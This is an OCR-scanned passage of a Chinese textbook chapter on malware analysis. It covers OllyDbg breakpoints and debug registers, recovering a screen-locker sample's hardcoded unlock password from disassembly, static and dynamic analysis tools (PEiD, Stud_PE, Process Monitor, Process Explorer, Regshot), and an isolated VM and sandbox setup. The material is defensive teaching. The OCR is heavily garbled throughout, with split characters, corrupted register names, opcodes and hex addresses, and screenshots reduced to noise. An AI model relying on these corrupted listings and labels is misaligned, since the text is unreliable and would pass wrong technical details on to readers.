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(8) 内 存 访问 一 次 性 断 点 CSingle-shot break on memory access) 〈 仅 在 Windows 
NT/2000 下 可 用 ) 。 对 整个 内 存 块 设 置 该 类 断 点 可 以 通过 内 存 窗口 的 快捷 菜单 〈 或 按 F2 
键 ) 来 完成 。 若 想 捕捉 调用 或 返回 到 某 个 模块 时 ， 该 类 断 点 就 显得 特别 有 用 。 中 断 发 生 以 
后 ， 断 点 将 被 删除 。 

(9) 暂停 Run 跟 踪 (Run trace pause) 其 快捷 键 为 Ctrl+T。 和 暂停 Run 跟 踪 是 在 每 一 步 
Run 跟 踪 (run trace) 时 都 要 检查 的 一 个 条 件 集 ， 它 可 以 在 EIP 进 入 某 个 范围 或 超出 某 个 范 
围 时 暂停 、 某 个 条 件 为 真 时 暂停 、 命 令 与 指定 的 模式 匹配 时 暂停 、 当 命令 可 疑 的 时 候 暂 
停 。 注 意 ， 这 一 选择 会 极 大 地 (高 达 20%》 降低 Run 跟 踪 的 速度 。 

OllyDbg 也 可 以 在 一 些 调试 事件 (debugging events) 上 暂停 程序 执行 ， 比 如 加 载 或 全 
载 DLL、 启 动 或 终止 线程 或 者 程序 发 出 调试 字符 串 的 时 候 暂 停 。 

CPU 操作 的 对 象 是 寄存 器 ， 寄 存 器 又 有 诸多 分 类 ， 其 中 有 一 类 就 是 调试 和 测试 寄 
存 器 。 

调试 寄存 器 被 称 为 DR。(n 为 下 角 标 ) 。DR 调 试 寄存 器 总 共有 8 个 ， 从 DRo 到 DR， 。 

每 个 寄存 器 的 作用 如 下 。 

> DR,—DR, 调试 地 址 寄存 器 〈 保 存 地 址 ) 。 


> DR,—DR;: 保留 。 їп 
> DR: 调试 寄存 器 组 状态 寄存 器 。 hr 


80000000 
> DR; 调试 寄存 器 组 控制 寄存 器 。 


80008008 


在 OllyDbg 中 的 调试 寄存 器 窗口 可 以 查看 寄存 器 的 80000086 








值 ， 如 图 9-5 所 示 。 图 9-5 ”调试 寄存 器 

这 里 下 一 个 硬件 访问 断 点 〈 见 图 9-6) ， 可 以 看 到 DRo 已 经 保存 了 断 点 1 指向 的 地 址 。 
而 DRe、DR; 也 出 现 了 数据 。 这 里 不 对 此 获 述 ， 因 为 涉及 了 标志 位 ， 具 体 的 详细 解释 可 以 
参考 百度 百科 或 者 相关 书籍 。 


>] | оке e012FFce 
# Ж 大 小 ”中断 于 DR1 00000000 


3 DR2 08080808 
i [шта [z || 358 pesos] mei | оез ввввввов 
e | m=i La. Гас: a 
з f = [ Е NES | DR7 88870581 


erea ane. 


图 9-6 硬件 断 点 

设置 访问 断 点 之 后 ， 如 果 是 在 API 上 下 断 会 直接 定位 到 API 地 址 。 关 于 标题 栏 的 指向 
技巧 ， 如 图 9-7 所 示 。 

kK 011уІСЕ | 
图 9-7 ”OllyICE 标 题 栏 比较 

在 图 9-7 上 方 显示 “模块 -MSVBVM60” 字 样 ， 如 果 显 示 的 并 非 是 调试 程序 的 名 称 ， 说 
明 已 经 离开 了 用 户 代 码 ， 如 果 这 个 时 候 去 脱 壳 ， 脱 的 并 不 是 调试 程序 的 壳 。 

常用 下 断 点 的 方式 是 bp API 函 数 〈 见 图 9-8) ， 例如 bp DeleteFileA 〈 区 分 大 小 写 ) 。 
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程序 直接 运行 后 ， 遇 到 DeleteFile 函 数 调用 就 会 断 下 来 ， 这 里 也 有 人 会 下 bp DeleteFileW 断 
点 。 需 要 说 明 一 下 ， 此 方式 涉及 字符 处 理 的 API 都 有 两 个 版 本 ，ANSI ("А") 和 ("W") 
的 Unicode 版 本 。 
00504018 [00 88 00 
00505028; 00 00 
005D^038| 00 
00501048 | 00 
00503058 06 00000000 


900505068|08 00 00 а |0012FóA4| CCCCCCCC 


90504078|00 00 00 0.0 0012Fón8| CCCCCCCC 


CommadEpDeeterien — — — eji 

图 9-8 bp API 函 数 
通过 这 个 断 点 可 以 知道 这 个 样本 自 运行 后 会 删除 什么 。 如 果 确 定 这 个 位 置 就 是 病毒 的 
主要 代码 ， 那 么 可 以 执行 到 返回 ， 然 后 在 领 室 (push ebp) 处 直接 下 断 ， 重 载 程序 并 运行 
到 断 点 ， 然 后 逐个 分 析 每 一 个 语句 。 


日 < Den919Fn | [тк 到 MRR 来 自 dwad. 00401BF 
el 0012F694| 995843D8|LFilehane = " 
LI 9912F698| 0012F98^ 
9 |0012F69C| 00175E70 
LI 0012F600| 
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首先 打开 样本 ， 此 时 会 弹出 来 一 个 对 话 框 窗口 ， 可 以 看 到 
鼠标 被 限制 在 窗口 区 域内 ， 并 出 现 桌 面 图 标 消 失 等 状况 ， 如 图 
9-9 所 示 。 

使 用 OllyDbg 载 入 这 个 程序 ， 执 行 到 入 口 处 〈 见 图 9-10) 。 图 9-9 “а” жЕ 














$ 810424 761E0Í add duord ptr [esp], 1Е76 
00501191 |. FFDO call eax 
00401193 |. ба 00 h в Exittode = 8 
00401195 |. E8 2C000000 call <jmp.&KERNEL32.ExitProcess> xitProcess 


图 9-10 ”入 口 点 位 置 
前 面 都 是 一 些 加 载 易 语言 库 文件 的 操作 ， 很 容易 找到 入 
然后 ， 按 F7 键 跟 进 这 个 call [call eax]i& fg, 这 里 不 再 次 述 了 。 由 于 只 有 一 个 按钮 ， 所 

















以 跟踪 到 这 个 按钮 事件 。 
此 时 可 以 一 目 了 然 地 看 到 密码 ， 如 图 9-11 所 示 。 

Call BeusnEF3 户 输入 的 密码 
add esp, 10 栈 

8945 FC nou dword ptr [ebp-4], eax i 的 密码 存 入 变量 

68 QC314000 push 0050310C ASCII "wozhenxiangzisha'" 

FF75 FC push dword ptr [ebp-h] 读 取 的 密码 

E8 86F7FFFF — |call 00189409 字符 吊 是 否 一 致 

83C^ 08 add esp, 8 

83F8 00 cnp eax, 

B8 00000800 тоо eax, 

eronce sete al 

8945 F8 mou dword ptr [ebp-8], eax 

8В50 FC mou ерх, dword ptr [ebp-4] 

85DB test ebx, ebx 

74 99 je Short 00489074 

53 push ebx 

ES 94110000 call 80h8aF05 比较 密码 

83Ch 0h add esp, ^ 


图 9-11 “а” ае 
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这 里 如 果 中 毒 的 话 ， 可 以 直接 再 运行 这 个 程序 ， 然 后 输入 wozhenxiangzisha 就 可 以 了 。 


923 ”重要 辅助 工具 


当然 ， 要 想 更 加 透彻 地 分 析 病 毒 ， 仅 仅 使 用 OD 是 不 够 的 ， 本 节 将 介绍 一 些 常用 的 病 
毒 分 析 工 具 ， 便 于 读者 从 行为 、 部 分 源码 上 理解 病毒 的 原理 ， 以 及 杀毒 软件 是 如 何 有 效 防 
治 病 毒 入 侵 计 算 机 的 原理 。 


1. PEiD 一 一 查 壳 工 具 


PEiD 〈 见 图 9-12) 在 本 书 中 多 次 提 到 ， 是 一 款 非常 优秀 的 针对 PE 文件 的 查 过 软件 ， 
病毒 通过 加 过 一 方面 为 了 达到 免 杀 的 目的 ， 另 一 方面 也 是 为 了 保护 代码 不 被 轻易 地 破解 分 
析 。 加 壳 的 病毒 程序 通常 需要 脱 壳 以 后 才能 从 真正 的 入 口 点 函数 开始 分 析 。 














图 9-12 ”PEiD 使 用 界面 
图 9-13 所 示 的 是 一 个 加 壳 的 文件 。 很 显然 ， 程 序 代码 通过 加 密 以 后 ， 第 一 行 显示 出 来 
的 并 不 是 程序 入 口 点 函数 所 代表 的 基地 址 ， 同 时 也 无 法 从 代码 中 读 出 有 用 的 信息 。 








[CPU 主线 程 ， 模 块 复 件 _aaa] 
РР) 选项 了 I) wr 
H0 EE E '| jJ. поемам [e] 

ШИ $ 60 — — pushad | pm 
0652D0E71| . ВЕ 00804200 ‚8 
0042DE76| . ВОВЕ 0990FDFllea edi, dword ptr [esi«FFFD9000] 
8042DE7C| . 57 push edi 
0852DE7D| . 89Е5 mou ebp, esp 
0042DE7F| . 8D9C24 80CiFllea ерх, dword ptr [еѕр-ЗЕ80] 
0042DE86| . 31C@ xor eax, eax 
0842DES8| > 50 push eax 
0042DE89| . 39DC cnp esp, ebx 
0042DEBB| .~ 75 FB jnz Short 8852DE88 
8842DESD| . аб inc esi 
BB42DESE| . 46 inc esi 
B842DESF| . 53 push x 
0852DF90| . 68 29858208 push 28529 
0042DE95| . 57 push edi 
0042DE96| . 83С3 04 add ebx, 4 
0842DE99| . 53 ush ebx 
0042DE90| . 68 6C5E0000 | push 5E6C 
Ben2DE9F| . 56 push esi 
ввл2реав| . 83C3 04 add ерх, 4 
8842DEA3| . 53 push ebx 
QOh2DER 28 Jpush еах 











图 9-13 ”加 壳 文件 
进行 脱 壳 处 理 之 后 ， 就 能 很 明显 地 看 到 代码 的 真实 面目 ， 代 码 第 一 行 也 恢复 为 正常 的 
入 口 点 函数 ， 同 时 从 注释 中 可 以 看 到 该 程序 调用 了 MessageBoxA 函 数 ， 如 图 9-14 所 示 。 
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aaa- exe 一 [CPU - HTE, BUR- aaa] 


ej zer) ЖЕУ) MY MO 选项 四 窗口 如 帮助 中 





























00101011] . ebp, 

00401013||. 83EC ^8 sub esp, 40 

00491616]. 53 push ерх 

00401617]. 56 push esi 

een91918 || . 57 push edi 

eene1919 |. 807D ce lea edi, dword ptr [еһр-һ®] 

0050101 ||. вә 19000000 тоо ecx, 18 

00401021]. вв CCCCCCCC |тоо eax, СССССССС 

00401026 | . stos dword ptr es:[edi] 

00491028 || . esi, esp 

00409102A | . в Style = MB OK|MB RPPLMODRL 
00401020 | . 00422030 Title = "уез" 
00401031||. 68 28204200 push 00422028 Text = "haha" 
00401036 | . ба ве push 0 howner = NULL 
00401038 ||. FF15 nCnR2828| call — dword ptr [<&USER32.MessageBoxñi[MessageBoxñ 
0040103Е ||. 3BFA еѕі, еѕр 

09401040] . ЕВ 5BO00000 _chkesp 

(esne18na5|| . 8gBFs esi, esp 

00401057 |. ба 00 9 Style = MB OK|MB RPPLMODRL 
00401059 | . 68 24204200 push 00422024 Title - "no" 
00&010&E |. 68 1C204200 push 00422091C Text - "yay. 
00401053 |. ба B0 push 0 howner = NULL 
00401055 ||. FF15 йСа2%20!са11 ^ dword ptr [<&USER32.MessageBoxALMessageBoxA 








图 9-14 ”文件 脱 壳 后 


简单 地 说 。PE 文 件 就 是 Windows 平 台 上 的 可 执行 程序 ， 包 括 exe、dll、com、sys、ocx 


等 各 种 文件 。 


既然 作用 于 计算 机 的 病毒 都 是 PE 文件 格式 ， 那 么 也 可 以 使 用 专门 分 析 PE 文 件 的 软件 
来 分 析 病 毒 ， 如 Stud_PE。 


2. Stud_PE 


在 Stud PE〈 见 图 9-15) 的 “在 16 进 位 编辑 器 中 视图 文件 头 树 ” 中 的 “数据 Hox" Br 


后 ， 可 以 清楚 地 看 到 数据 是 被 加 了 UPX 壳 〈 见 图 9-16) 。 
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> хна | pos | ока | "ав |" wa |*sm | * 过 项 | 
эзы BR 
ти O Ab 实际 地 址 
юля _][ооогкооо 「 oo0000E0 Гоососеоо 
sáu  ][o0000000 [00000000 | 00000000 
жыня: [eme нт анат ë c 
I ] Go666655 ` [00006006 [00000006 




















[  =ismmasasaqimaenan | 信行 到 文件 
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文件 比 对 

















9-15 ”Stud_PE 功 能 图 
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зов 病毒 不 神秘 ¿U Ё 








图 9-16 ”UPX 壳 
打开 Stud_PE 主 界面 的 函数 选项 ， 可 以 清楚 地 了 解 到 该 程序 调用 的 函数 类 型 〈 见 图 
9-17) 。 
Stud РЕ 编辑 : “ 复 件 aaa- exze”- [32 位 应 用 程序 ] 
XPO SEO ТАФ KAW 
| EVdocuments and еїйпос\айтип\4& Ш\ЗГЁЁ aaa,exe 


3 文件 关 | Dos| оке "gm |з |o 签名 
зала 

















图 9-17 ”函数 分 析 界面 
其 中 KERNEL32.DLEL 装 载 的 是 程序 的 winmain 入 口 函数 ，USER32.DLL 装 载 则 是 
MessageBoxA， 这 可 是 在 加 壳 的 情况 下 就 能 看 到 的 ， 因 此 一 款 分 析 PE 文 件 的 软件 在 加 壳 程 
序 函数 的 分 析 上 是 优 于 调试 器 的 ， 类 似 的 软件 还 有 PEview。 
当然 ， 也 有 专门 分 析 程 序 调用 函数 的 武器 一 一 Dependency Walker〈 见 图 9-18) 。 
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-18 Dependency Walker 界 面 
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接 下 来 将 介绍 两 种 强大 的 进程 监控 软件 一 Process Monitor 和 Process Explorer。 
3. Process Monitor， 进 程 监控 器 ( 简称 procmon ) 


procmon 的 主 界面 如 图 9-19 所 示 ， 图 上 详细 列举 了 每 一 个 程序 所 使 用 的 函数 、 路 径 等 
详细 信息 。 


m; Process Wonitor 





Sysinternals: www.sysinternals.com 



















































le Edit Eyent Filter Tools Options Help 
cEEIAEE!vAGO!E!A4A:!([zBgAam 
| Process Name | PID Operation Path Result Detail 

3:39... ffProcmon eze 3236 BÁFASTIO NETR...C:VWINDORSVsyStem32Vdbghelp. dll SUCCESS CreationTime:... 
3:39... ffProcmon ехе 3236 А FASTIO_NETR. ..C:\RINDORS\system32\dbghelp. dll SUCCESS CreationTime:. 
3:39... ffProcmon ехе 3236 А ТЕР XJ CREATE C:\RINDORS\szstem32\dbghelp. dll SHARING VIOLA... Desired Acces. 
3:39... ffProcmon eze 3236 EÀ FASTIO_NETR. ..C:\RINDORS\system32\MSCTFIME. IME SUCCESS CreationTime 
3:39... ffProcmon eze 3236 BÀ FASTIO_NETR. . .C:\RINDORS\system32\MSCTFIME. IME SUCCESS CreationTime:. 
3:39... ffProcmon eze 3236 EÑ FASTIO_NETR. . .C:\RINDORS\system32\MSCTFIME. IME SUCCESS CreationTime:. 
3:39... ffProcmon eze 3236 А РАЗТІО NETR...C:VWINDORSVsyStem32VMSCTFIME, IME SUCCESS CreationTime 
3:39... ffProcmon eze 3236 [ÀIRP XJ CREATE C:\RINDORS\szstem32\MSCTFIME. IME SHARING VIOLA... Desired Acces. 
3:39... [T]lsass. exe 708 fÉlkerOpenker НКІМ\ЗЕСИКІТҮ\Ро1ісу SUCCESS Desired Ассез... 
3:39... [7]lsass. exe 708 ШЙ RerOpenkey НКІМ\ЗЕСИКІТҮ\Ро1і су\Зесреѕс SUCCESS Desired Ассез... 
3:39... E] 1sass. ехе 708 Ø RerQueryzValue HXLMVSECURITYMPOliczASecDescV(... BUFFER OVERFLOR Length: 12 
9:39... 器 1sass. ехе 708 ШЙ ReeClosekey НКІМ\ЗЕСИЋІТҮ\Ро1і су\Зесреѕс SUCCESS 
9:39... 器 1sass. ехе 708 fÉ[RerOpenker — HXLMVSECURITYVPoli су\Зесреѕс SUCCESS Desired Acces... 
9:39... [7]lsass. eze 708 Ш KegQueryValue HKLA\SECURITY\Policy\SecDesc\ C... SUCCESS Туре: REG NOM... 
9:39... [7]1sass. ехе 708 fÉ[RerCloseker — HXLMVSECURITYVPoli cy VSecDesc SUCCESS 
9:39... [7]1sass. ехе 708 Ø RegCloseKey НКІМ\ЗЕСИКІТҮ\Ро1ісу SUCCESS 
9:39... C] sass. eze 708 Ш RezOpenKey НКІМ\ЗЕСИКІТҮ\Ро1ісу SUCCESS Desired Acces... 
9:39... O] 1sass. eze 708 fÉ[RerOpenker — HKLXNSECURITYAPolicy\SecDesc SUCCESS Desired Acces... 
3:39... lsass. eze 708 Й KegQueryValue HKLM\SECURITY\Policy\SecDesc\(... BUFFER OVERFLOW Length: 12 
9:39... Z] sass. eze 708 fÉlRerCloseker — HKLXNSECURITYAPolicy\SecDesc SUCCESS 
9:39... Z] sass. eze 708 Ш RerOpenkey НКІМ\ЗЕСИЋІТҮ\Ро1і су\Зесреѕс SUCCESS Desired Acces... 
9:39... []1зазз.еше 708 Ш KegQueryValue HKLA\SECURITY\Policy\SecDesc\(... SUCCESS Туре: REG NON... 
3:39... 2] 15азх. exe 708 fÉ[RerCloseker — HXLMVSECURITYVPoli су\Зесрезс SUCCESS 
3:39... Z] 1sass. exe 708 Ш RerCloseker — HXLMVSECURITYVMPolicr SUCCESS 
3:39... ZT Procmon.eze 3236 EÑ FASTIO_NETR. . .C:\RINDORS\system32\lsass. eze SUCCESS CreationTime:... 
3:39... ffProcmon ехе 3236 EÑ IRP_JU CREATE C:\RINDORS\system32\lsass. ere SUCCESS Desired Acces... 
3:39... ffProcmon ехе 3236 BÀ FASTIO_ACQU. ..C:\RINDORS\system32\lsass. eze SUCCESS $упсТуре: Syn... 
3:39... ffProcmon eze 3236 EK FASTIO_QUER. ..C:\RINDORS\srstem32\lsass. eze SUCCESS Туре: Queryst... 
3:39... ffProcmon eze 3236 E FASTIO_RELE. ..C:\RINDORS\s7stem32\lsass. eze SUCCESS 
3:39... ffProcmon exe 3236 BÀ FASTIO_ACQU. ..C:\RINDORS\system32\lsass. eze SUCCESS $упсТуре: Syn. 
3:39... ffProcmon eze 3236 BÀ FASTIO_RELE. . .C:\RINDORS\szstem32\lsass. eze SUCCESS 
3:39... ffProcmon eze 3236 EÀ ІКР_ИЈ СЕАНУРС: \RINDORS\system32\lsass. eze SUCCESS 
3:39... ZT Procmon. eze 3236 А ІР XI CLOSE C:\RINDORS\szstem32\lsass. eze SUCCESS 
9:39... ffProcmon eze 3236 EK FASTIO_NETR. ..C:\RINDORS\szstem32\lsass. eze SUCCESS CrestionTime:... 
3:39... ffProcmon exe — 3236 EÀIRP XI CREATE C:\RINDORS\s7stem32\lsass. eze SUCCESS Desired Acces... 
3:39... ffProcmon exe 3235 BÀ FASTIO_ACQU. ..C:\RINDORS\system32\lsass. ere — SUCCESS SrneTrpe: Syn... 
3:39... ffProcmon exe 3235 А РАЗТІО QUER...C:VRINDORSAszstem32Mlsass. eze SUCCESS Туре: QuerrzSt... 
3:39... ffProcmon exe 3235 EÀ РАЗТІО RELE...C: VRINDORS szstem32Mlsass. eze SUCCESS 
3:39... ffProcmon exe — 3236 EÑ FASTIO_ACQU. . .C:\RINDORS\s7stem32\lsass. eze — SUCCESS SrneTrpe: Syn... 
9:39... ÉfProcmon.exe 3236 EAFASTIO RELE...C:VWINDORSisrzstem32llsass.exe SUCCESS 
3:39... C]Srstem 4 ERIRP X) QUER...C:WWINDOWSAszstem32Vlsass. ехе — SUCCESS Туре: QuerrMa... 
3:39... ÉfProcmon ехе 3236 EÀIRP XJ CLEANVPC:VWINDORSVsystem32Wlsess.ere SUCCESS 
3:39... ffProcmon ехе 3236 BÁIRP XJ CLOSE C:\RINDORS\s7stem32\lsass. eze SUCCESS 
3:39... ffProcmon ехе 3236 А FASTIO_NETR. ..C:\RINDORS\szstem32\lsass. eze SUCCESS CreationTime:. 
3:39... ffProcmon ехе 3236 EÀIRP XJ CREATE C:\RINDORS\s7stem32\lsass. eze SUCCESS Desired Acces. 
3:39... ffProcmon ехе 3236 EÑ FASTIO_ACQU. . .C:\RINDORS\s7stem32\lsass. eze SUCCESS SrncTrpe: Syn... 
3:39... ffProcmon exe 3236 BÑ FASTIO_QUER. . .C:\RINDORS\s7stem32\lsass. eze SUCCESS Туре: Queryst... 
3:39... ffProcmon exe 3236 EÑ FASTIO_RELE. . .C:\RINDORS\s7stem32\lsass. eze SUCCESS 
3:39... ZZProcmon exe — 3236 EK FASTIO ACQU. ..C:\RINDORS\szstem32\lsass. eze SUCCESS SyncTzpe: Syn... 





图 9-19 ”procmon 主 界面 





选中 其 中 的 一 个 程序 双击 ， 打 开 Event Properties 对 话 框 ， 可 以 看 到 这 个 程序 所 加 载 的 
DLL 库 连 接 、 创 建 与 运行 时 间 ， 如 图 9-20 所 示 。 在 Process 选 项 卡 中 可 以 看 到 程序 所 在 的 安 
装 地 址 以 及 最 下 方 整个 程序 所 加 载 的 DLL 库 及 其 位 置 ， 如 图 9-21 所 示 。 而 最 后 一 个 Stack 选 
项 卡 ， 描 述 了 程序 以 及 加 载 的 DLL 库 函 数 在 内 存 中 的 位 置 。 
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Š Event Properties 




































































[Event process | stack | 
Date: 2015-4-30 9:39:20 
Te зол 
class: не system 
Operston: FASTIO NETWORK QUERY OPEN 
пеше success т 
vam: ca winbovesystemsztdboneip a - _ 
URS CEST [C Documents and Settingsladminl E VE ЖУЗ Ur ProcessMonitor(1)lProcmon.e, 
CreakionTimer 2008-4-14 20:00:00 Architecture: 32-bit 
ER 2-30 9:39:20 
LastwrteTime: 2008-4-14 20:00:00. Wu 上 na 
angelime: 2014-10-14 20:16:17 9 
Albcstonsice: $43,072 м nh. 
ndorrie ; ASD-29780F069904admin 
ehttrtutes: А 
00000000:0002626 
2015-4-309:39:19 
See Path. a 
0xifc000 C:\Documents and Sett ^ 
CAWINDOWS|system3 
WStsystemi | 
> 
EXE S 
图 9-20 Eventi 图 9-21 Process 选 项 


该 程序 最 有 用 的 则 是 Process Monitor Filter 功 能 ， 如 图 9-22 所 示 。 


Display entries matching these conditions: 
Operation is wl М then |Indude М 
ПАР MJ SET VOLUME INFORMA ^ 


'IRP- MJ SHUTDOWN раста 
IRP_MJ_SYSTEM_CONTROL ws 
IRP_MJ_VOLUME_DISMOUNT 
SEU Relation 'IRP- MJ. VOLUME, MOUNT 
- ПАР МЈ WRITE 
ө Event is IRP_MN_QUERY_INFORMATION 
Load Image 
Process Create 
Process Exit 
Process Profiling 
Process Start 
Process Statistics 
RegCloseKey 
RegCreateKey 
RegDeleteKey 
RegDeletevalue Apply 
RegEnumKey 
RegEnumvalue 
RegFlushkey 
RegLoadKey 
RegOpenkey 
RegQueryKey 
RegQueryKeySecurit 





























М 























m 


IRegQueryValue 
RegRenamekey 
ReaSetInfoKey 
IRegSetKeySecurity 
IRegSetValue м 
图 9-22 Filter 过 滤 
读者 可 以 在 Filter 中 选择 想 监控 的 函数 ， 这 样 可 以 使 繁杂 的 界面 变 得 简单 ， 同 时 也 可 
以 有 针对 性 地 对 病毒 的 某 种 功能 进行 详细 监控 。 
其 实 看 程序 最 方便 的 还 是 看 进程 树 ， 虽 然 这 款 软件 中 也 有 Process Tree (Tools 选 项 下 


第 2 个 ) 功能 ， 但 是 却 无 法 与 接 下 来 将 要 介绍 的 软件 相 比 。 
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4. Process Explorer 


Process Explorer 可 以 使 进程 、 PID、CPU 占 用 率 等 一 目 了 然 ， 其 中 标记 蓝 色 的 进程 为 
用 户 进程 ， 红 色 为 系统 进程 ， 绿 色 为 新 运行 的 进程 ， 如 图 9-23 所 示 。 为 了 查看 系统 文件 是 
和 否 被 修改 ， 可 以 打开 “选项 ”菜单 下 的 “验证 映像 数字 签名 (Microsoft 验 证 ) ”命令 。 


www.sysinternals.com [ASD-297B0F06990\adain] 






























$f Process Explorer - Sysinternals: 











т## P аж 


ане T с 
mternmts сот x X за Hrdmre Interrupts a 

„ри 200 x 444 K 580 Rindows NT Session Ja... Microsoft Corporation 

esrss. eze 26E 6,32 628Client Server Runtime... Microsoft Corporation 

аЙ eee 3,24 КЮ SM К 652 Rindows WT Logon Appl... Microsoft Corporation 


services. eze 1,916 X 3,904 X — 696 Services and Controll... Microsoft Corporation 
methlp. eze nik 2,608 К. 880 Ware Activation Helper Ware, Inc. 
[chost eze 2,956 x 5.444 К 896 Generic Host Process... Microsoft Corporation 
svchost, exe 1,924 к 4,452 X 364 Generic ost Process ,.. Microsoft Corporation 
Pla eze 16,212 K 27,600 К 1060 Generic Host Process... Microsoft Corporation 
QQ aucit. eze SX 5,490 Х| 2016 Automatic Updates. Microsoft Corporation 
Im] те 664 X 2,464 K 1408 Windows Security Cent... Microsoft Corporation 
он. eze 1,416 X 3,720 К 1148 Generic Host Process ... Microsoft Corporation 
加 webost eze 179 X 4,952 К. 1260 Generic Most Process... Microsoft Corporation 














|spoolsv. exe 4,796 X 7,148 X 1432 Spooler Subs7sten App Microsoft Corporation 
|vmtcolsá. eze 3,968 K 12,376 К 1676 Vare Tools Core Ser... Wmre, Inc 
1,240 X 3,104 X 192 Application Lazer Çat... Microsoft Corporation 
1,460 X 4,464 X 392 ThinPrint AutoConnect... Cortado АС 


i 4 204 X 7,916 X 1000 ThinPrint AutoConnect... Cortado AG 








LGTDX 4,192 K 1724 Image Mastering API Microsoft Corporation 

3 3,944 X 1,224 K — TOBLSA Shell (Export Ver... Microsoft Corporation 

5 Q йө exe 9.96 — 35 T6 X Microsoft Corporation 
mtoolsd eze 11,424 X 2. Mare, Тас. 

aobeARN exe 4,252 к -. Adobe S7stens Ineor 

ctfeon eze эм x 3,769 к) 1096 CTF Loader Microsoft Corporation 





1,564 X $20 к 0432 086 Microsoft Corporation 
1,564 X eer 3956 记事 本 Microsoft Corporation 
1,564 X Tex o ®г@&Ж Microsoft Corporation 
4,640 X 7:2 K 1952 ЗЛАМ archiver Alezander Roshal 
2,344 к т.056 к 2908 ЮЛЕ сіни Sogou. com Inc. 

145 — 26,516 X 17,872 X| 1704 Sysinternals Process ... Sysinternals — www... 











图 9-23 ”procexp 进 程 树 


5. Regshot 


Regshot 是 一 款 注册 表 快 照 软件 。 单 击 “ 快 照 (A) ”按钮 运行 目标 文件 ， 单 击 “ 快 照 
(B) ”后 就 会 出 现 检测 注册 表 是 否 修改 ， 以 及 伴随 着 注册 表 修 改 而 产生 的 文件 报告 ， 如 
图 9-24 所 示 。 


& Kegshot 2.0.1.66 unicode 


文件 юм} RET) # Wb 





口 连接 区 阮 和 注册 表 
хня: 
[C:Documents and Settiostadmn ti... ] 











RES: 
[Report 





EMERSA: 




















mstr М 





图 9-24 Regshot 
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924 虚拟 环境 搭建 


使 用 虚拟 机 搭建 虚拟 环境 在 分 析 病毒 时 是 
不 可 或 缺 的 ， 模 拟 出 一 个 真实 的 系统 并 且 构 造 ш = | ‹ё | O © @ [rj = x wm 
出 一 个 虚拟 的 网 络 来 隔绝 病毒 在 互联 网 传播 。 Eil a aeina x 

VMware Workstation 软 件 如 图 9-25 所 示 。 9-25 Vmware Workstation 软 件 

VMware Workstation 的 安装 过 程 以 及 基本 使 用 方式 与 VBox 类 似 ， 不 再 袭 述 ， 这 里 主要 
介绍 一 下 虚拟 网 络 的 搭建 过 程 。 

ApateDNS 软 件 界面 如 图 9-26 所 示 。 






-VMware Workstation 
文件 昌 S50 ЕЖУ 虚拟 机 (M) O #AH 

















































Т ApateDNS reyes 
Cotas з |а ан а] ' 
Tine Domain Requested DNS Returned | 

















DNS Reply IP (Default: Current Gatway/DRS): 127 0.0.1 Start 
# of NXDOMAIN s 0 
Selected Interface [wars Virtual Ethernet Adapter for Vnet2 >] Sur ieys, 














图 9-26 ApateDNS 主 界面 
打开 ApateDNS， 在 主 界面 的 CaptureWindow 选 项 卡 下 会 显示 访问 Internet 的 网 络 活动 ， 
在 下 方 的 DNS Reply IP 处 填写 将 要 访问 的 虚拟 人 P 地 址 ， 在 Selected Interface 处 选择 虚拟 机 当 
前 使 用 的 网 络 ， 单 击 Start Server 按 钮 ， 结 果 如 图 9-27 所 示 。 





















































ress 127.@.e.: Reply. 
127.0.0.1 on Wwere Virtual Ethernet Adapter for vnet2. 
Sending valid DNS response of first request. 

Server started at 21:16:27 successfully. 























DES Reply IP (Default: Current Gatway/DNS) Start 
Sever 

* of коют [] 

Selected Interface аге Virtual Ethernet Adapter for Minet v) inion 








图 9-27 ”运行 后 结果 
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随后 在 虚拟 机 中 打开 任意 一 个 网 站 ， 地 址 解析 将 会 跳 转 到 输入 的 虚拟 IP 地 址 ， 同 时 
ApateDNS 下 也 会 显示 将 要 访问 的 网 站 。 如 果 想 要 详细 地 了 解 病毒 的 网 络 动态 ， 请 使 用 
Wireshark 进 行 抓 包 。 

当然 ， 有 些 病毒 具有 反 虚 拟 机 技术 ， 即 在 虚拟 机 环境 下 病毒 不 会 运行 ， 这 时 便 需 要 使 
用 沙 箱 / 沙 盒 〈 见 图 9-28) 代替 虚拟 机 环境 。 


Fle View Sandbox Configure Help 
Program Name Рр Window Title 





© Sandbox DefaultBox 





图 9-28 W 
将 程序 拖 入 沙 箱 ， 就 可 以 在 一 个 安全 环境 下 运行 了 。 
接 下 来 将 用 以 上 提 到 的 工具 对 病毒 进行 行为 上 的 分 析 以 及 代码 上 的 揭秘 。 


9.2.5 ”病毒 实例 分 析 


请 务必 于 虚拟 机 或 者 沙 箱 内 运行 。 
33.exe〈 见 图 9-29) 是 一 个 典型 的 PE 文件 ， 先 使 用 杀毒 软件 对 其 进行 手动 查 杀 。 





图 9-29 33.exe 
(1) 先 对 虚拟 机 进行 一 次 快照 ， 作 为 系统 还 原 备 份 ， 并 且 记 录 当 前 运行 环境 信息 作 
为 备注 ， 如 图 9-30 所 示 。 





килене юнае 
(oy ЖЕНЕШЕ egg nts ЕЛШЕ зя 
(2 相同 的 杖 态 。 


名 称 (N): 快照 1 
T835(D): 运行 33.exe 之 前 


取消 
图 9-30 ”拍摄 还 原点 
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(2) 搭建 虚拟 网 络 ， 阻 止 病毒 与 网 络 的 接触 ， 将 网 络 配置 选择 为 虚拟 机 当前 网 络 ， 
如 图 9-31 所 示 。 
Selected Interface- Wware Virtual Ethernet Adapter for Wnet? + 
图 9-31 设置 虚拟 网 络 
有 了 以 上 两 点 准备 以 后 ， 就 可 以 先 尝试 从 行为 上 对 其 进行 分 析 。 
G) 打开 Regshot 软 件 ， 对 其 进行 两 次 快照 ， 快 照 时 应 选择 全 部 注册 表 并 且 备 注 信 
息 ， 如 图 9-32 所 示 。 














Е Regshot 2.0.1.66 unicode 
文件 RRO RAD жЕ 帮助 
口 连接 到 远程 注册 表 BUR) 
Ree: 快照 (8) 
C:\Documents and Settingsladin RI... f 


报告 名 称 ; 
[Esx zil 

















添加 注释 到 报告 ， 














Hi ur М 





图 9-32 ”注册 表 快 照 
快照 CA) 完毕 后 运行 33.exe 程 序 ， 同 时 使 用 Process Explorer 进 行进 程 监控 。 随 后 运行 
33.exe， 然 后 进行 快照 (B) ， 快 照 完 毕 后 会 弹出 一 个 分 析 报 告 网 页 ， 从 中 可 以 看 出 注册 
表 项 的 变化 〈 见 图 9-33 一 图 9-36) 。 
Zi 快照 比较 报告 Regshot 2.0.1.66 unicode — Microsoft Internet Explorer 
文件 F) AEO SEV бй) IAD #800 


